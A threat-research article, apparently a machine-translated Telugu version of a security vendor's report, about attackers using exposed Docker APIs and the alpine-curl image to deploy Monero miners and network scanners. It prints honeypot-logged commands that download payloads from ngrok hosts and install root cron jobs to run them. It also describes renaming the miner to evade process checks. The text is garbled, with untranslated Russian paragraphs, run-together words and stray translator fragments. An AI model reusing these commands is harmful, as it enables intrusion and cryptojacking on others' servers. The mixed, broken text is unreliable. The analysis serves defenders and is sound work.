క్రిప్టోకరెన్సీ మైనర్‌లను పంపిణీ చేయడానికి యాజమాన్యం లేని డాకర్ API మరియు సంఘం నుండి పబ్లిక్ ఇమేజ్‌లు ఎలా ఉపయోగించబడుతున్నాయి

ముప్పు పర్యవేక్షణ కోసం సృష్టించబడిన హనీపాట్ కంటైనర్‌ల ద్వారా సేకరించిన డేటాను మేము విశ్లేషించాము. ఈ విశ్లేషణలో, కమ్యూనిటీ ప్రచురించిన డాకర్ హబ్ ఇమేజ్‌ను ఉపయోగించి, రాగ్ కంటైనర్‌లుగా మోహరించిన అవాంఛిత లేదా అనధికార క్రిప్టోకరెన్సీ మైనర్‌ల నుండి గణనీయమైన కార్యకలాపాలను మేము కనుగొన్నాము. ఈ ఇమేజ్, క్రిప్టోకరెన్సీ మైనింగ్ మాల్వేర్‌ను అందించే ఒక సేవలో భాగంగా ఉపయోగించబడుతుంది.

అదనంగా, తెరిచి ఉన్న పొరుగు కంటైనర్‌లు మరియు అప్లికేషన్‌లలోకి చొచ్చుకుపోవడానికి, నెట్‌వర్క్‌లతో పనిచేసే ప్రోగ్రామ్‌లు ఇన్‌స్టాల్ చేయబడతాయి.

మేము మా హనీపాట్‌లను ఎలాంటి భద్రతా చర్యలు లేదా తదుపరి అదనపు సాఫ్ట్‌వేర్ ఇన్‌స్టాలేషన్ లేకుండా, వాటి డిఫాల్ట్ సెట్టింగ్‌లతో ఉన్నవి ఉన్నట్లుగానే వదిలివేస్తాము. లోపాలు మరియు సాధారణ బలహీనతలను నివారించడానికి డాకర్‌లో ప్రారంభ సెటప్ సిఫార్సులు ఉన్నాయని దయచేసి గమనించండి. అయితే, మేము ఉపయోగించే హనీపాట్‌లు అనేవి కంటైనర్‌లలోని అప్లికేషన్‌లను కాకుండా, కంటైనరైజేషన్ ప్లాట్‌ఫారమ్‌ను లక్ష్యంగా చేసుకుని జరిగే దాడులను గుర్తించడానికి రూపొందించిన కంటైనర్లు.

గుర్తించబడిన ఈ హానికరమైన చర్య ముఖ్యమైనది, ఎందుకంటే దీనికి బలహీనతలు అవసరం లేదు మరియు ఇది డాకర్ వెర్షన్‌పై ఆధారపడదు. తప్పుగా కాన్ఫిగర్ చేయబడిన, అందువల్ల బహిర్గతమైన, కంటైనర్ ఇమేజ్‌ను కనుగొంటే చాలు, దాడి చేసేవారు అనేక బహిర్గతమైన సర్వర్‌లకు సోకింపజేయగలరు.

అన్‌ప్రివిలేజ్డ్ డాకర్ API వినియోగదారునికి విస్తృత శ్రేణి పనులను నిర్వహించడానికి అనుమతిస్తుంది. జట్లునడుస్తున్న కంటైనర్‌ల జాబితాను పొందడం, ఒక నిర్దిష్ట కంటైనర్ నుండి లాగ్‌లను పొందడం, ప్రారంభించడం, ఆపడం (బలవంతంగా ఆపడంతో సహా), మరియు నిర్దిష్ట సెట్టింగ్‌లతో ఒక నిర్దిష్ట ఇమేజ్ నుండి కొత్త కంటైనర్‌ను సృష్టించడం వంటివి ఇందులో ఉన్నాయి.

ఎడమ వైపున మాల్వేర్ పంపిణీ పద్ధతి ఉంది. కుడి వైపున దాడి చేసేవారి వాతావరణం ఉంది, ఇది రిమోట్ ఇమేజ్ డిప్లాయ్‌మెంట్‌కు వీలు కల్పిస్తుంది.

3762 పబ్లిక్ డాకర్ APIల దేశాల వారీ పంపిణీ. ఫిబ్రవరి 12, 2019 నాటి షోడాన్ శోధన ఆధారంగా.

దాడి శ్రేణి మరియు పేలోడ్ వేరియంట్లు

హానికరమైన కార్యకలాపాలను గుర్తించడానికి హనీపాట్‌లు మాత్రమే మార్గం కాదు. మోనెరో మైనింగ్ సాఫ్ట్‌వేర్‌ను డిప్లాయ్ చేయడానికి బ్రిడ్జ్‌గా ఉపయోగించిన, తప్పుగా కాన్ఫిగర్ చేయబడిన కంటైనర్‌పై మేము దర్యాప్తు చేసినప్పటి నుండి బహిర్గతమైన డాకర్ APIల సంఖ్య (రెండవ చార్ట్ చూడండి) పెరిగిందని షోడాన్ డేటా చూపిస్తుంది. గత అక్టోబర్‌లో (2018, అందుబాటులో ఉన్న తాజా డేటా) మీరు దీన్ని ఈ విధంగా చూడవచ్చు సుమారు అనువాదకుడు856 ఓపెన్ APIలు మాత్రమే ఉన్నాయి.

హనీపాట్ లాగ్‌లను పరిశీలించగా, కంటైనర్ ఇమేజ్ వాడకం కూడా వాడకంతో ముడిపడి ఉందని వెల్లడైంది. ngrokngrok అనేది, బహిరంగంగా అందుబాటులో ఉన్న పాయింట్ల నుండి నిర్దిష్ట చిరునామాలకు లేదా వనరులకు (ఉదా., లోకల్‌హోస్ట్) సురక్షిత కనెక్షన్‌లను ఏర్పాటు చేయడానికి లేదా ట్రాఫిక్‌ను ఫార్వార్డ్ చేయడానికి ఉపయోగపడే ఒక సాధనం. ఇది, ఓపెన్ సర్వర్‌కు పేలోడ్‌లను పంపేటప్పుడు దాడి చేసేవారికి డైనమిక్‌గా URLలను సృష్టించడానికి వీలు కల్పిస్తుంది. ngrok సేవ యొక్క దుర్వినియోగాన్ని చూపే లాగ్‌ల నుండి తీసుకున్న కోడ్ ఉదాహరణలు కింద ఉన్నాయి:

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

మీరు గమనించినట్లుగా, అప్‌లోడ్ చేయబడిన ఫైల్‌లు నిరంతరం మారుతున్న URLల నుండి డౌన్‌లోడ్ చేయబడతాయి. ఈ URLలకు తక్కువ గడువు తేదీ ఉంటుంది, కాబట్టి వాటి గడువు ముగిసిన తర్వాత పేలోడ్‌లను డౌన్‌లోడ్ చేయడం సాధ్యపడదు.

Есть два варианта полезной нагрузки. Первый — скомпилированный майнер в формате ELF для Linux (определяемый как Coinminer.SH.MALXMR.ATNO), который подключается к пулу для майнинга. Второй — скрипт (TrojanSpy.SH.ZNETMAP.A), предназначенный для получения определенных сетевых инструментов, используемых для сканирования сетевых диапазонов и последующего поиска новых целей.

డ్రాపర్ స్క్రిప్ట్ రెండు వేరియబుల్స్‌ను సెట్ చేస్తుంది, వీటిని తరువాత క్రిప్టోకరెన్సీ మైనర్‌ను డిప్లాయ్ చేయడానికి ఉపయోగిస్తారు. HOST వేరియబుల్‌లో హానికరమైన ఫైల్స్ ఉన్న URL ఉంటుంది, మరియు RIP వేరియబుల్ అనేది డిప్లాయ్ చేయాల్సిన మైనర్ యొక్క ఫైల్ పేరు (నిజానికి దాని హాష్). హాష్ వేరియబుల్ మారిన ప్రతిసారీ HOST వేరియబుల్ కూడా మారుతుంది. దాడికి గురవుతున్న సర్వర్‌లో మరే ఇతర క్రిప్టోకరెన్సీ మైనర్లు పనిచేయడం లేదని కూడా ఈ స్క్రిప్ట్ ధృవీకరించడానికి ప్రయత్నిస్తుంది.

HOST మరియు RIP వేరియబుల్స్ యొక్క ఉదాహరణలు, అలాగే ఇతర మైనర్లు ఏవీ నడవడం లేదని తనిఖీ చేయడానికి ఉపయోగించే కోడ్ యొక్క ఒక భాగం.

Прежде чем запускать майнер, он переименовывается в nginx. Другие версии этого скрипта переименовывают майнер в другие легитимные сервисы, которые могут присутствовать в окружениях Linux. Этого обычно достаточно для обхода проверок по списку запущенных процессов.

సెర్చ్ స్క్రిప్ట్‌కు కూడా దాని స్వంత ప్రత్యేక లక్షణాలు ఉన్నాయి. అవసరమైన సాధనాలను అమలు చేయడానికి ఇది అదే URL సేవను ఉపయోగిస్తుంది. వీటిలో నెట్‌వర్క్‌లను స్కాన్ చేయడానికి మరియు ఓపెన్ పోర్ట్‌ల జాబితాను పొందడానికి ఉపయోగించే zmap బైనరీ కూడా ఉంటుంది. కనుగొనబడిన సేవలతో సంభాషించడానికి మరియు కనుగొనబడిన సేవ గురించి అదనపు సమాచారాన్ని (దాని వెర్షన్ వంటివి) నిర్ధారించడానికి వాటి నుండి బ్యానర్‌లను తిరిగి పొందడానికి ఉపయోగించే మరొక బైనరీని కూడా ఈ స్క్రిప్ట్ డౌన్‌లోడ్ చేస్తుంది.

ఈ స్క్రిప్ట్ స్కానింగ్ కోసం కొన్ని నెట్‌వర్క్ శ్రేణులను కూడా ముందుగానే నిర్వచిస్తుంది, కానీ ఇది స్క్రిప్ట్ వెర్షన్‌పై ఆధారపడి ఉంటుంది. అలాగే, స్కాన్‌ను అమలు చేయడానికి ముందు, ఇది సర్వీసుల నుండి—ఈ సందర్భంలో, డాకర్ నుండి—లక్ష్య పోర్టులను కూడా నిర్దేశిస్తుంది.

Как только найдены предполагаемые цели — автоматически из них снимаются баннеры. Скрипт также фильтрует цели в зависимости от интересующих его сервисов, приложений, компонентов или платформ: Redis, Jenkins, Drupal, MODX, కుబెర్నెటెస్ మాస్టర్డాకర్ క్లయింట్ 1.16, మరియు అపాచీ కౌచ్‌డిబి. స్కాన్ చేయబడిన సర్వర్ వీటిలో దేనితోనైనా సరిపోలితే, అది ఒక టెక్స్ట్ ఫైల్‌లో సేవ్ చేయబడుతుంది, దీనిని దాడి చేసేవారు తరువాత మరింత విశ్లేషణ మరియు హ్యాకింగ్ కోసం ఉపయోగించుకోవచ్చు. ఈ టెక్స్ట్ ఫైల్‌లు డైనమిక్ లింక్‌ల ద్వారా దాడి చేసేవారి సర్వర్‌లకు అప్‌లోడ్ చేయబడతాయి. దీని అర్థం ప్రతి ఫైల్‌కు ఒక ప్రత్యేక URL ఉంటుంది, ఇది తదుపరి యాక్సెస్‌ను కష్టతరం చేస్తుంది.

కింది రెండు కోడ్ స్నిప్పెట్‌లలో చూడగలిగినట్లుగా, ఉపయోగించిన దాడి పద్ధతి ఒక డాకర్ ఇమేజ్.

పైన ఒక చట్టబద్ధమైన సేవగా పేరు మార్చడం, మరియు కింద నెట్‌వర్క్‌లను స్కాన్ చేయడానికి zmapను ఎలా ఉపయోగిస్తారో చూపబడింది.

పైన ముందుగా నిర్వచించిన నెట్‌వర్క్ శ్రేణులు, దిగువన డాకర్‌తో సహా సేవలను శోధించడానికి నిర్దిష్ట పోర్ట్‌లు ఉన్నాయి.

ఆల్పైన్-కర్ల్ ఇమేజ్‌ను 10 మిలియన్లకు పైగా సార్లు డౌన్‌లోడ్ చేసినట్లు స్క్రీన్‌షాట్ చూపిస్తుంది.

На основе Alpine Linux и curl, ресурсоэффективного инструмента CLI для передачи файлов по различным протоколам, можно собрать డాకర్ చిత్రంమునుపటి చిత్రంలో మీరు చూడగలిగినట్లుగా, ఈ ఇమేజ్ ఇప్పటికే 10 మిలియన్లకు పైగా సార్లు డౌన్‌లోడ్ చేయబడింది. ఈ అధిక సంఖ్యలో డౌన్‌లోడ్‌లు ఈ ఇమేజ్ ఒక ఎంట్రీ పాయింట్‌గా ఉపయోగించబడుతోందని సూచించవచ్చు; ఈ ఇమేజ్ ఆరు నెలల క్రితం అప్‌డేట్ చేయబడింది; ఈ రిపోజిటరీలోని ఇతర ఇమేజ్‌లు వినియోగదారులచే అంత తరచుగా డౌన్‌లోడ్ చేయబడలేదు. డాకర్‌లో ప్రవేశ స్థానం — ఒక కంటైనర్‌ను ప్రారంభించడానికి కాన్ఫిగర్ చేయడానికి ఉపయోగించే సూచనల సమితి. ఎంట్రీ పాయింట్ తప్పుగా కాన్ఫిగర్ చేయబడితే (ఉదాహరణకు, కంటైనర్ ఇంటర్నెట్‌కు బహిర్గతమైతే), ఆ ఇమేజ్‌ను ఒక దాడి సాధనంగా ఉపయోగించవచ్చు. మద్దతు లేని, సరిగ్గా కాన్ఫిగర్ చేయని, లేదా బహిర్గతమైన కంటైనర్‌ను దాడి చేసేవారు కనుగొంటే, వారు దానిని పేలోడ్‌లను పంపడానికి ఉపయోగించవచ్చు.

గమనించాల్సిన ముఖ్య విషయం ఏమిటంటే, ఈ ఇమేజ్ (alpine-curl) స్వయంగా హానికరమైనది కాదు, కానీ పైన చూడగలిగినట్లుగా, దీనిని హానికరమైన పనులను చేయడానికి ఉపయోగించవచ్చు. ఇలాంటి డాకర్ ఇమేజ్‌లను కూడా హానికరమైన ప్రయోజనాల కోసం ఉపయోగించవచ్చు. మేము డాకర్‌ను సంప్రదించాము మరియు ఈ సమస్యపై వారితో కలిసి పనిచేస్తున్నాము.

సిఫార్సులు

తప్పుగా అమర్చడం అవశేషాలు నిరంతర సమస్య అనేక కంపెనీలకు, ముఖ్యంగా అమలు చేస్తున్న వారికి DevOpsవేగవంతమైన అభివృద్ధి మరియు డెలివరీపై దృష్టి సారించడం. ఆడిటింగ్ మరియు పర్యవేక్షణ నిబంధనలకు కట్టుబడి ఉండాల్సిన అవసరం, డేటా గోప్యతను పర్యవేక్షించాల్సిన అవసరం, మరియు నిబంధనలను పాటించకపోవడం వల్ల కలిగే భారీ ఖర్చుల కారణంగా ఇది మరింత తీవ్రమవుతుంది. అభివృద్ధి జీవనచక్రంలో భద్రతా ఆటోమేషన్‌ను చేర్చడం వలన, మామూలుగా గమనించకుండా పోయే భద్రతా లోపాలను గుర్తించడంలో సహాయపడటమే కాకుండా, అప్లికేషన్ విస్తరణ తర్వాత గుర్తించిన ప్రతి దుర్బలత్వం లేదా తప్పు కాన్ఫిగరేషన్ కోసం అదనపు సాఫ్ట్‌వేర్ బిల్డ్‌లను అమలు చేయడం వంటి అనవసరమైన పనిభారాలను కూడా తగ్గిస్తుంది.

ఈ వ్యాసంలో చర్చించిన సంఘటన, కింది సిఫార్సులతో సహా, ప్రారంభం నుండే భద్రతపై దృష్టి సారించాల్సిన అవసరాన్ని నొక్కి చెబుతోంది:

• సిస్టమ్ అడ్మినిస్ట్రేటర్లు మరియు డెవలపర్‌ల కోసం: మీ API సెట్టింగ్‌లు ఒక నిర్దిష్ట సర్వర్ లేదా అంతర్గత నెట్‌వర్క్ నుండి మాత్రమే అభ్యర్థనలను స్వీకరించేలా కాన్ఫిగర్ చేయబడ్డాయో లేదో నిర్ధారించుకోవడానికి వాటిని ఎల్లప్పుడూ తనిఖీ చేయండి.
• కనీస అధికార సూత్రాన్ని అనుసరించండి: కంటైనర్ ఇమేజ్‌లు సంతకం చేయబడి, ధృవీకరించబడ్డాయని నిర్ధారించుకోండి, కీలక భాగాలకు (కంటైనర్ లాంచ్ సర్వీస్) యాక్సెస్‌ను పరిమితం చేయండి మరియు నెట్‌వర్క్ కనెక్షన్‌లను ఎన్‌క్రిప్ట్ చేయండి.
• అనుసరించండి సిఫార్సులు మరియు భద్రతా యంత్రాంగాలను ప్రారంభించండి, అవి డాకర్ నుండి మరియు అంతర్నిర్మిత భద్రతా లక్షణాలు.
• కంటైనర్‌లో నడుస్తున్న ప్రాసెస్‌ల గురించి అదనపు సమాచారాన్ని పొందడానికి రన్‌టైమ్‌లు మరియు ఇమేజ్‌ల ఆటోమేటెడ్ స్కానింగ్‌ను ఉపయోగించండి (ఉదాహరణకు, స్పూఫింగ్‌ను గుర్తించడానికి లేదా దుర్బలత్వాల కోసం శోధించడానికి). అప్లికేషన్ నియంత్రణ మరియు సమగ్రత పర్యవేక్షణ సర్వర్‌లు, ఫైల్‌లు మరియు సిస్టమ్ ప్రాంతాలలో అసాధారణ మార్పులను గుర్తించడంలో సహాయపడతాయి.

ట్రెండ్‌మైక్రో, డెవ్‌ఆప్స్ బృందాలు సురక్షితంగా నిర్మించడానికి, వేగంగా అమలు చేయడానికి మరియు ఎక్కడైనా నడపడానికి సహాయపడుతుంది. ట్రెండ్ మైక్రో హైబ్రిడ్ క్లౌడ్ సెక్యూరిటీ సంస్థ యొక్క DevOps పైప్‌లైన్‌లో శక్తివంతమైన, ఆప్టిమైజ్ చేయబడిన మరియు ఆటోమేటెడ్ భద్రతను అందిస్తుంది మరియు ముప్పుల నుండి రక్షించుకోవడానికి బహుళ మార్గాలను సమకూరుస్తుంది. XGen రన్‌టైమ్‌లో ఫిజికల్, వర్చువల్ మరియు క్లౌడ్ వర్క్‌లోడ్‌లను రక్షించడానికి. ఇది కంటైనర్ రక్షణను కూడా జోడిస్తుంది. లోతైన భద్రత и డీప్ సెక్యూరిటీ స్మార్ట్ చెక్ఇవి డెవలప్‌మెంట్ పైప్‌లైన్‌లో ఏ దశలోనైనా మాల్‌వేర్ మరియు బలహీనతల కోసం డాకర్ కంటైనర్ ఇమేజ్‌లను స్కాన్ చేసి, వాటిని డిప్లాయ్ చేయడానికి ముందే ముప్పులను నివారిస్తాయి.

రాజీ సంకేతాలు

సంబంధిత హాష్‌లు:

• 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
• f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

ఆఫ్ డాకర్‌పై వీడియో కోర్సు పైన వివరించిన పరిస్థితి సంభవించే అవకాశాన్ని తగ్గించడానికి లేదా పూర్తిగా నివారించడానికి మొదట ఏ సర్దుబాట్లు చేయాలో ఆచరణాత్మక నిపుణులు ప్రదర్శిస్తారు. మరియు ఆగస్టు 19-21 తేదీలలో, ఆన్‌లైన్ ఇంటెన్సివ్‌లో DevOps టూల్స్ & చీట్స్ మీరు ఈ మరియు ఇలాంటి భద్రతా సమస్యలను సహోద్యోగులు మరియు వృత్తిరీత్యా ఉపాధ్యాయులతో ఒక రౌండ్‌టేబుల్ చర్చలో చర్చించవచ్చు, అక్కడ ప్రతి ఒక్కరూ తమ అభిప్రాయాలను వ్యక్తపరచవచ్చు మరియు అనుభవజ్ఞులైన సహోద్యోగుల కష్టాలను, విజయాలను వినవచ్చు.

మూలం: www.habr.com